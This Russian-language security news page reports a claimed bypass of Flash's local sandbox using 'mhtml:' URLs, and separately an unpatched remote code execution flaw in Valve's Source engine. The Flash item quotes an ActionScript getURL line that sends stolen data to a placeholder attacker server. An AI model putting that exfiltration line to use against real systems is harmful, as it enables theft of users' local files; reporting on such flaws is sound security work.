Простой способ обхода «песочницы» Flash

Был найден специалистом в области безопасности. Он утверждает, что даже если файл был запущен локально, то для злоумышленника отправить его на удаленный сервер не составит труда.

Как известно, компания Adobe в своей продукции предусмотрела некоторые меры по защите доступа к сети. Одной из мер является встроенная в приложение «песочница», посредством которой осуществляется контроль доступа к сети через черный список. В этот список включены заголовки протоколов, например HTTP и HTTPS.

Однако, исследователь в области безопасности Билли Риос, утверждает, что можно отправлять файлы на сервер, используя в заголовках запись «file:», но в этом случае данные будут гулять по локальной сети. А для отправки данных на удаленный сервер, по его мнению, вполне подойдет заголовок – mhtml.

Этот заголовок по умолчанию поддерживается в операционных системах семейства Windows, и поэтому данные могут быть отправлены при помощи ActionScript команды: «getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);». Стоит заметить, что для подтверждения своей гипотезы специалист не привел никаких демонстрационных материалов.

Конечно, удивительно, что настолько легко и просто можно обойти одну из «песочниц»
Flash. Однако, это открытие не представляет серьезной опасности, поскольку вряд ли пользователи будут специально скачивать себе на компьютер SWF файл, чтобы просмотреть через плеер. Обычно, такие файлы просматриваются в обозревателе, где предусмотрен иной набор правил.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Valve никак не пропатчит 2-летнюю дыру в Source (CS:GO, Half-Life)

Группа специалистов в области кибербезопасности, называющая себя Secret Club, сообщила в Твиттере об уязвимости игрового движка Source 3D, за разработкой которого стоит Valve. Выявленный баг, по словам экспертов, позволяет выполнить код удалённо.

Таким образом, уязвимость затрагивает множество игровых проектов Valve, причём исследователи сообщили разработчику о проблеме около двух лет назад.

Тем не менее последний релиз Counter Strike: Global Offensive (CS:GO) содержит этот же баг. Помимо него, затронуты Half-Life, Half-Life 2, Garry's Mod, Team Fortress, Left 4 Dead и Portal. Экспертов Secret Club при этом раздражает, что они не могут опубликовать технические детали, ведь патча до сих пор нет.

Один из исследователей, сообщивших о баге, заявил, что на сегодняшний день уязвимость всё ещё актуальна. Это значит, что потенциальный злоумышленник может запустить вредоносный код на компьютерах игроков.

Для эксплуатации уязвимости достаточно отправить жертве приглашение поиграть на площадке Steam. Подробнее специалисты объяснили в видео:

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru